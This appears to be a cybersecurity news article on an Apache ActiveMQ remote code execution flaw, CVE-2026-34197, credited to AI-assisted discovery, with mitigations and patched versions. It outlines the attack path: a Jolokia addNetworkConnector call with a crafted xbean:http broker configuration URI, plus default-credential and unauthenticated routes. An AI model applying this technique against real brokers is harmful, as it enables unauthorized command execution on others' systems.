In a striking development, researchers have uncovered a critical remote code execution (RCE) vulnerability in Apache ActiveMQ Classic—one that remained hidden for over 13 years. However, what makes this discovery even more remarkable is that Anthropic’s Claude AI model identified the flaw in under 10 minutes, dramatically accelerating traditional vulnerability research timelines.
The vulnerability, tracked as CVE-2026-34197, originates from improper input validation and code injection issues within ActiveMQ’s Jolokia JMX-HTTP bridge. This component is exposed via the web console endpoint /api/jolokia/ on port 8161. As a result, attackers with valid credentials can exploit this flaw by invoking the addNetworkConnector(String) function on the broker’s MBean.
Specifically, attackers can inject a malicious VM transport URI containing a crafted brokerConfig=xbean:http:// parameter. Consequently, when ActiveMQ processes this request, it dynamically creates an embedded broker using the attacker-controlled configuration. This behavior ultimately allows arbitrary operating system command execution through Spring’s XML processing mechanism.
Moreover, the root cause of this issue traces back to a previous fix for CVE-2022-41678. At that time, developers introduced a broad Jolokia allow rule for ActiveMQ’s internal MBeans to maintain web console functionality. Unfortunately, this decision unintentionally exposed sensitive management operations, including addNetworkConnector, thereby expanding the attack surface.
Although the vulnerability typically requires authentication, many enterprise environments still rely on default credentials such as admin:admin. Even more concerning, systems running ActiveMQ versions 6.0.0 through 6.1.1 face an unauthenticated attack path. Due to CVE-2024-32114, authentication checks were inadvertently removed from the /api/* endpoint, making exploitation significantly easier.
Historically, Apache ActiveMQ has been a frequent target for cyberattacks. Notably, previous vulnerabilities such as CVE-2016-3088 and CVE-2023-46604 are listed in CISA’s Known Exploited Vulnerabilities catalog, highlighting the platform’s ongoing security challenges.
Researchers at Horizon3.ai credited Claude AI for identifying this complex vulnerability chain. By leveraging a structured prompt and real-time validation, the AI successfully mapped interactions across Jolokia, JMX, and VM transport layers in minutes. Analysts emphasized that a human expert might have required an entire week to uncover the same attack path.
Mitigation Steps
To mitigate risks, organizations should closely monitor ActiveMQ logs for suspicious vm:// URIs, unusual POST requests to /api/jolokia/, and unexpected outbound connections. Additionally, defenders must watch for abnormal processes initiated by the ActiveMQ JVM.
Importantly, Apache has released patches in versions 5.19.4 and 6.2.3. These updates eliminate the risky functionality that allowed VM transport registration via Jolokia. Therefore, organizations should immediately upgrade and audit all deployments, especially those using default credentials.
Recommended Cyber Technology News:
- Infosys and Harness Partner to Accelerate AI-Driven Software Delivery Transformation
- Kaseya Opens Silicon Valley Hub To Accelerate AI Innovation
- Nasuni Launches Advanced Offerings to Transform Enterprise Data Management
To participate in our interviews, please write to our CyberTech Media Room at info@intentamplify.com
